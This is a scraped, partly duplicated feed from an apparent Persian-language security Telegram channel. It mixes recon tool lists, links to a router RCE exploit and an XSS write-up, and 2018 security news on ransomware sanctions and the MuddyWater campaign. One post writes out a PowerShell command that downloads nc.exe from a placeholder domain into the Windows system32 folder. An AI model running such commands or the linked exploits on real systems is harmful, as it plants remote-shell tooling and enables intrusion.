Online #OSINT CheckList [Reconnaissance] :
* Dnstrails - Best for enumerating Subdomains
* Viewdns.info - Various tools [Finding Origin IP behind Cloudflare, and so on) - Recommended
* Google ASE aka Google Dorking
* Pentest-tools
* Dumpster
* VirusTotal
* Crt.sh - Best for enumerating related domains
* Dnsgoodies
#security #infosec #bugbounty #enumeration #pentest #redteam #cybersecurity
@sec_nerd
* Dnstrails - Best for enumerating Subdomains
* Viewdns.info - Various tools [Finding Origin IP behind Cloudflare, and so on) - Recommended
* Google ASE aka Google Dorking
* Pentest-tools
* Dumpster
* VirusTotal
* Crt.sh - Best for enumerating related domains
* Dnsgoodies
#security #infosec #bugbounty #enumeration #pentest #redteam #cybersecurity
@sec_nerd
ابزار trape برای جمع آوری اطلاعات از اشخاص در اینترنت
https://github.com/jofpin/trape
#osint
#enum
@sec_nerd
https://github.com/jofpin/trape
#osint
#enum
@sec_nerd
This media is not supported in your browser
VIEW IN TELEGRAM
پس از سقوط ارزش بیت کوین به زیر ۴ هزار دلار، چینی ها دستگاه های ماینر خود را به حراج گذاشته اند!
https://twitter.com/DoveyWan/status/1066678209679249408
#btc
#news
#china
@sec_nerd
https://twitter.com/DoveyWan/status/1066678209679249408
#btc
#news
#china
@sec_nerd
لیستی از افزونه های کاربردی burpsuite:
تست نفوذ اپلیکیشن های NET. :
https://github.com/allfro/dotNetBeautifier
Java Deserialization Scanner:
https://github.com/federicodotta/Java-Deserialization-Scanner
Java Serial Killer:
https://github.com/NetSPI/JavaSerialKiller
و ادامه لیست در لینک زیر:
https://github.com/snoopysecurity/awesome-burp-extensions
#burpsuite
#web
#pentest
@sec_nerd
تست نفوذ اپلیکیشن های NET. :
https://github.com/allfro/dotNetBeautifier
Java Deserialization Scanner:
https://github.com/federicodotta/Java-Deserialization-Scanner
Java Serial Killer:
https://github.com/NetSPI/JavaSerialKiller
و ادامه لیست در لینک زیر:
https://github.com/snoopysecurity/awesome-burp-extensions
#burpsuite
#web
#pentest
@sec_nerd
GitHub
allfro/dotNetBeautifier
A BurpSuite extension for beautifying .NET message parameters and hiding some of the extra clutter that comes with .NET web apps (i.e. __VIEWSTATE). - allfro/dotNetBeautifier
دانلود فایل با استفاده از پاورشل (معادل wget در لینوکس)
Invoke-WebRequest "https://domain.tld/nc.exe" -OutFile "C:\\windows\\system32\\nc.exe"
#windows
#ps
@sec_nerd
Invoke-WebRequest "https://domain.tld/nc.exe" -OutFile "C:\\windows\\system32\\nc.exe"
#windows
#ps
@sec_nerd
شرکت uber بخاطر ناتوانی در محافظت از اطلاعات مشتریانش توسط دیدبان حریم شخصی بریتانیا به میزان ۴۹۱ هزار دلار جریمه شد.
این جریمه بخاطر هک شدن اوبر در سال ۲۰۱۶ و دزدیده شدن اطلاعات حدود 2.7 میلیون کاربر بریتانیایی اعمال شده است.
منبع:
https://www.engadget.com/2018/11/27/uber-ico-uk-fine-cyber-attack/
#news
#uber
#breach
#uk
@sec_nerd
این جریمه بخاطر هک شدن اوبر در سال ۲۰۱۶ و دزدیده شدن اطلاعات حدود 2.7 میلیون کاربر بریتانیایی اعمال شده است.
منبع:
https://www.engadget.com/2018/11/27/uber-ico-uk-fine-cyber-attack/
#news
#uber
#breach
#uk
@sec_nerd
Engadget
Uber fined £385,000 in the UK for 2016 cyber-attack
Around 2.7 million UK users were affected by the breach.
پلیس فدرال امریکا (FBI) برای به دام انداختن اسکمرها دست به ساخت وبسایت جعلی fedEx زد (fedEx یک سرویس ارسال محموله های پستی است)
این اسکمرها وانمود میکردند که فرد قابل اعتمادی هستند و شرکتها را مجاب به ارسال مبالغ بالا میکردند.در این عملیات FBI با ساخت این وبسایت و همچنین ایجاد داکیومنت های آلوده ی آفیس که منجر به برملا شدن آی پی اصلی مجرمان میشد، موفق به یافتن مکان آنان شد.
پلیس ها آدرس وبسایت جعلی را به مجرمان دادند، آنها همچنین خطایی را در وبسایت برای کاربرانی که از پروکسی استفاده میکنند به نمایش درآوردند. ابتدا آی پی های متعددی به وبسایت متصل شدند که برخی از آنها نیز از پروکسی استفاده میکردند. پلیس برای مشخص شدن آی پی ها از روش بازرسی شبکه (NIT) بهره برد و با کمک داکیومنتهای ورد توانست آی پی اصلی مجرمان را بدست آورد.
اطلاعات بیشتر:
https://motherboard.vice.com/en_us/article/d3b3xk/the-fbi-created-a-fake-fedex-website-to-unmask-a-cybercriminal
#news
#usa
#fbi
#scam
@sec_nerd
این اسکمرها وانمود میکردند که فرد قابل اعتمادی هستند و شرکتها را مجاب به ارسال مبالغ بالا میکردند.در این عملیات FBI با ساخت این وبسایت و همچنین ایجاد داکیومنت های آلوده ی آفیس که منجر به برملا شدن آی پی اصلی مجرمان میشد، موفق به یافتن مکان آنان شد.
پلیس ها آدرس وبسایت جعلی را به مجرمان دادند، آنها همچنین خطایی را در وبسایت برای کاربرانی که از پروکسی استفاده میکنند به نمایش درآوردند. ابتدا آی پی های متعددی به وبسایت متصل شدند که برخی از آنها نیز از پروکسی استفاده میکردند. پلیس برای مشخص شدن آی پی ها از روش بازرسی شبکه (NIT) بهره برد و با کمک داکیومنتهای ورد توانست آی پی اصلی مجرمان را بدست آورد.
اطلاعات بیشتر:
https://motherboard.vice.com/en_us/article/d3b3xk/the-fbi-created-a-fake-fedex-website-to-unmask-a-cybercriminal
#news
#usa
#fbi
#scam
@sec_nerd
Vice
The FBI Created a Fake FedEx Website to Unmask a Cybercriminal
In an attempt to identify someone tricking a company into handing over cash, the FBI created a fake FedEx website, as well as deployed booby-trapped Word documents to reveal fraudsters' IP addresses.
تست نفوذ دستگاههای صنعتی (PLC)
https://medium.com/tenable-techblog/plc-bug-hunt-fa3a0aeae9ab
#scada
#pentest
@sec_nerd
https://medium.com/tenable-techblog/plc-bug-hunt-fa3a0aeae9ab
#scada
#pentest
@sec_nerd
اکسپلویت اجرای دستور از راه دور بر روی روتر TP-Link Archer C5
(CVE-2018-19537)
https://github.com/JackDoan/TP-Link-ArcherC5-RCE/
#exploit
#network
#rce
#tplink
@sec_nerd
(CVE-2018-19537)
https://github.com/JackDoan/TP-Link-ArcherC5-RCE/
#exploit
#network
#rce
#tplink
@sec_nerd
GitHub
GitHub - JackDoan/TP-Link-ArcherC5-RCE: CVE-2018-19537
CVE-2018-19537. Contribute to JackDoan/TP-Link-ArcherC5-RCE development by creating an account on GitHub.
رایت آپ
از آپلود داکیومنت word تا stored xss
https://www.coalfire.com/The-Coalfire-Blog/May-2018/Microsoft-Word-Document-Upload-to-Stored-XSS
#writeup
#office
#web
#pentest
#xss
#bugbounty
@sec_nerd
از آپلود داکیومنت word تا stored xss
https://www.coalfire.com/The-Coalfire-Blog/May-2018/Microsoft-Word-Document-Upload-to-Stored-XSS
#writeup
#office
#web
#pentest
#xss
#bugbounty
@sec_nerd
وبسایت sci-hub که مقالات علمی را بصورت رایگان در اختیار دانشجویان و محققان قرار میدهد متعلق به خانم Alexandra Elbakyan قزاقستانی است.
او فارق التحصیل دانشگاه آلماتی است و در آنجا به هک علاقمند شد. او از پرداخت پول برای مقالاتی که به آنها نیاز داشت خسته شده بود و با توانمندیهای خود در هک، توانست مقالات را برای خود و همکلاسی هایش بصورت رایگان فراهم کند.
او در مسکو، آلمان و جورجیا امریکا نیز کار کرد و در سال ۲۰۱۱ به کشورش برگشت. با دیدن نیاز افراد به مقالات در طی این سالها، تصمیم به راه اندازی وبسایت sci-hub گرفت که در سال ۲۰۱۵ بیش از ۴۲ میلیون دانلود در آن ثبت شد.
او هم اکنون در مکانی نامعلوم در مقطع کارشناسی ارشد در حال تحصیل است.
او توسط امریکا تحت تعقیب است اما روسیه هیچ متهمی را به امریکا تحویل نمیدهد!
الکساندرا اکنون سی سال دارد و دامنه جدید وی پس از حذف شدن دامنه های پیشین، از آدرس https://sci-hub.tw/ قابل دستیابی است.
https://hackaday.com/2018/11/27/sci-hub-breaking-down-the-paywalls/
@sec_nerd
او فارق التحصیل دانشگاه آلماتی است و در آنجا به هک علاقمند شد. او از پرداخت پول برای مقالاتی که به آنها نیاز داشت خسته شده بود و با توانمندیهای خود در هک، توانست مقالات را برای خود و همکلاسی هایش بصورت رایگان فراهم کند.
او در مسکو، آلمان و جورجیا امریکا نیز کار کرد و در سال ۲۰۱۱ به کشورش برگشت. با دیدن نیاز افراد به مقالات در طی این سالها، تصمیم به راه اندازی وبسایت sci-hub گرفت که در سال ۲۰۱۵ بیش از ۴۲ میلیون دانلود در آن ثبت شد.
او هم اکنون در مکانی نامعلوم در مقطع کارشناسی ارشد در حال تحصیل است.
او توسط امریکا تحت تعقیب است اما روسیه هیچ متهمی را به امریکا تحویل نمیدهد!
الکساندرا اکنون سی سال دارد و دامنه جدید وی پس از حذف شدن دامنه های پیشین، از آدرس https://sci-hub.tw/ قابل دستیابی است.
https://hackaday.com/2018/11/27/sci-hub-breaking-down-the-paywalls/
@sec_nerd
دو شخص جدید ایرانی توسط امریکایی ها تحت تعقیب قرار گرفتند.
علی خوراشادی زاده و محمد قربانیان دو فردی هستند که دپارتمان OFAC آدرس والت بیت کوین آنها را در کنار نام آنها قرار داده و از شهروندان میخواهد که از انتقال ارز دیجیتال به این آدرسها خودداری کنند.
به ادعای امریکایی ها این دو فرد به باج افزار SamSam مرتبط هستند. این باج افزار تاکنون ۲۰۰ قربانی داشته که این قربانی ها از شرکتها، بیمارستانها، دانشگاهها و مراکز دولتی بوده اند.
موسسه OFAC معتقد است این دو فرد بیش از ۷ هزار تراکنش بیت کوین داشته اند و آن را تبدیل به ریال کرده اند. این ۷ هزار تراکنش تقریبا ۶هزار بیت کوین بوده است.
این دو فرد به لیست SDN که افراد و مقامات و دستگاهها و شرکتهای ایرانی فراوانی را شامل میشود،اضافه شده اند.
منبع:
https://www.coindesk.com/us-regulators-tie-two-bitcoin-addresses-to-iranian-ransomware-plot
#news
#iran
#usa
#ransomware
#btc
#sdn
#fatf
@sec_nerd
علی خوراشادی زاده و محمد قربانیان دو فردی هستند که دپارتمان OFAC آدرس والت بیت کوین آنها را در کنار نام آنها قرار داده و از شهروندان میخواهد که از انتقال ارز دیجیتال به این آدرسها خودداری کنند.
به ادعای امریکایی ها این دو فرد به باج افزار SamSam مرتبط هستند. این باج افزار تاکنون ۲۰۰ قربانی داشته که این قربانی ها از شرکتها، بیمارستانها، دانشگاهها و مراکز دولتی بوده اند.
موسسه OFAC معتقد است این دو فرد بیش از ۷ هزار تراکنش بیت کوین داشته اند و آن را تبدیل به ریال کرده اند. این ۷ هزار تراکنش تقریبا ۶هزار بیت کوین بوده است.
این دو فرد به لیست SDN که افراد و مقامات و دستگاهها و شرکتهای ایرانی فراوانی را شامل میشود،اضافه شده اند.
منبع:
https://www.coindesk.com/us-regulators-tie-two-bitcoin-addresses-to-iranian-ransomware-plot
#news
#iran
#usa
#ransomware
#btc
#sdn
#fatf
@sec_nerd
CoinDesk
US Regulators Tie Two Bitcoin Addresses to Iranian Ransomware Plot - CoinDesk
For the first time, the U.S. Treasury Department is adding crypto addresses to its list of Specially Designated Nationals.
امنیت اطلاعات
این کمپین MuddyWater نام دارد و از تروجانی با نام زاگرس بهره میبرد. لینک اسکن دراپر این بدافزار در virustotal: https://www.virustotal.com/en/file/ad7231143d982b0754735d72752010ad188d7b788a018c8d0197ac6819361360/analysis/ لینک سرورهای C2: https://ghostbin…
اطلاعات جدید در مورد کمپین فیشینگ MuddyWater که به ادعای شرکت اسراییلی ClearSky مرتبط با ایران است، بدست آمده.
این کمپین اخیرا با استفاده از روش های مخفی سازی پیلود در بکدور خود با دستورات PowerShell و استفاده از دامنه های اسراییلی و لبنانی، اقدام به آلوده سازی اهداف خود میکند.
الگوهای آلوده سازی این کمپین در ایمیل های جعلی و داکیومنت هایی که حاوی کدهای ماکرو و در قالب رزومه یا نامه هایی از سوی دادگستری لبنان یا عربستان بوده است.
مراحل کار در این حمله شامل گامهای زیر است:
اجرای کد مخفی شده در داکیومنت آفیس که منجر به اجرای دستورات پاورشل میشود
در مرحله دوم کدهای پیچیده سازی شده از سرورهای هک شده دانلود و اجرا میشوند که ترکیبی از کدهای پاورشل، VB و جاوااسکریپت هستند.
منبع:
https://www.clearskysec.com/muddywater-operations-in-lebanon-and-oman/
#news
#apt
#iran
#ps
#spear_phishing
@sec_nerd
این کمپین اخیرا با استفاده از روش های مخفی سازی پیلود در بکدور خود با دستورات PowerShell و استفاده از دامنه های اسراییلی و لبنانی، اقدام به آلوده سازی اهداف خود میکند.
الگوهای آلوده سازی این کمپین در ایمیل های جعلی و داکیومنت هایی که حاوی کدهای ماکرو و در قالب رزومه یا نامه هایی از سوی دادگستری لبنان یا عربستان بوده است.
مراحل کار در این حمله شامل گامهای زیر است:
اجرای کد مخفی شده در داکیومنت آفیس که منجر به اجرای دستورات پاورشل میشود
در مرحله دوم کدهای پیچیده سازی شده از سرورهای هک شده دانلود و اجرا میشوند که ترکیبی از کدهای پاورشل، VB و جاوااسکریپت هستند.
منبع:
https://www.clearskysec.com/muddywater-operations-in-lebanon-and-oman/
#news
#apt
#iran
#ps
#spear_phishing
@sec_nerd